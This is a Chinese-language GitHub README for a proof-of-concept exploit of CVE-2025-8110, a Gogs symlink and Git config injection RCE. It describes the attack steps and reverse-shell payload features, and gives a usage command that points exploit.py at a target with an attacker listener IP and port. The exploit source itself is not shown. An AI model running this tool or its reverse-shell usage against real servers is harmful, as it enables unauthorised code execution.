NetsecBandit/CVE-2025-8110-Exploit

GitHub: NetsecBandit/CVE-2025-8110-Exploit

针对 Gogs 符号链接导致的 Git 配置注入 RCVE 的概念验证利用程序。

Stars: 0 | Forks: 0

# CVE-2025-8110 - Gogs 符号链接 Git 配置注入 RCE [![Python 3.8+](https://img.shields.io/badge/Python-3.8+-blue.svg)](https://www.python.org/downloads/) [![License](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE) [![Security](https://img.shields.io/badge/Security-Research-red.svg)](https://gogs.io/) CVE-2025-8110 的概念验证利用程序,这是一种 Gogs 自托管 Git 服务中的关键远程代码执行 (RCE) 漏洞,允许攻击者通过符号链接操纵和 Git 配置注入执行任意命令。 ## 🚨 漏洞概述 **CVE-2025-8110** 影响 Gogs 的 [受影响版本] 之前的版本。该漏洞允许经过身份验证的用户: 1. 创建一个包含指向 `.git/config` 的符号链接的存储库 2. 通过 API 覆盖存储库的 `.git/config`(通过符号链接) 3. 注入恶意的 `sshCommand` 指令,在克隆或拉取存储库时执行 这将导致以 Gogs 服务器进程权限运行的远程代码执行。 ## 🎯 功能 - **自动化利用**:端到端的利用自动化 - **多格式认证**:支持密码和 API 令牌认证 - **反向 Shell**:可配置的反向 Shell 有效载荷 - **错误处理**:健壮的错误恢复和替代方法 - **调试输出**:详细的日志记录用于故障排除 ## 📋 先决条件 - Python 3.8 或更高版本 - 已安装并可在 PATH 中访问 Git - `requests` Python 包 - 目标 Gogs 实例上的有效凭据或 API 令牌 ## 🔧 安装 ``` # 克隆仓库 git clone https://github.com/NetsecBandit/CVE-2025-8110-exploit.git cd CVE-2025-8110-exploit # 安装依赖 pip install requests # 使脚本可执行 chmod +x exploit.py ## 用法 python3 exploit.py \ -u http://target-gogs.com \ -lh Your_IP \ -lp 9001 \ --token ```
标签:API令牌, CVE, Git, Git配置篡改, Gogs, Python, RCE, SSH命令注入, T1055, T1059, T1078, Tactics, 供应链攻击, 反向Shell, 开源安全工具, 数字取证, 数字签名, 无后门, 权限绕过, 符号链接, 编程工具, 网络安全, 网络安全研究, 自动化脚本, 认证绕过, 远程代码执行, 逆向工具, 逆向工程平台, 配置注入, 隐私保护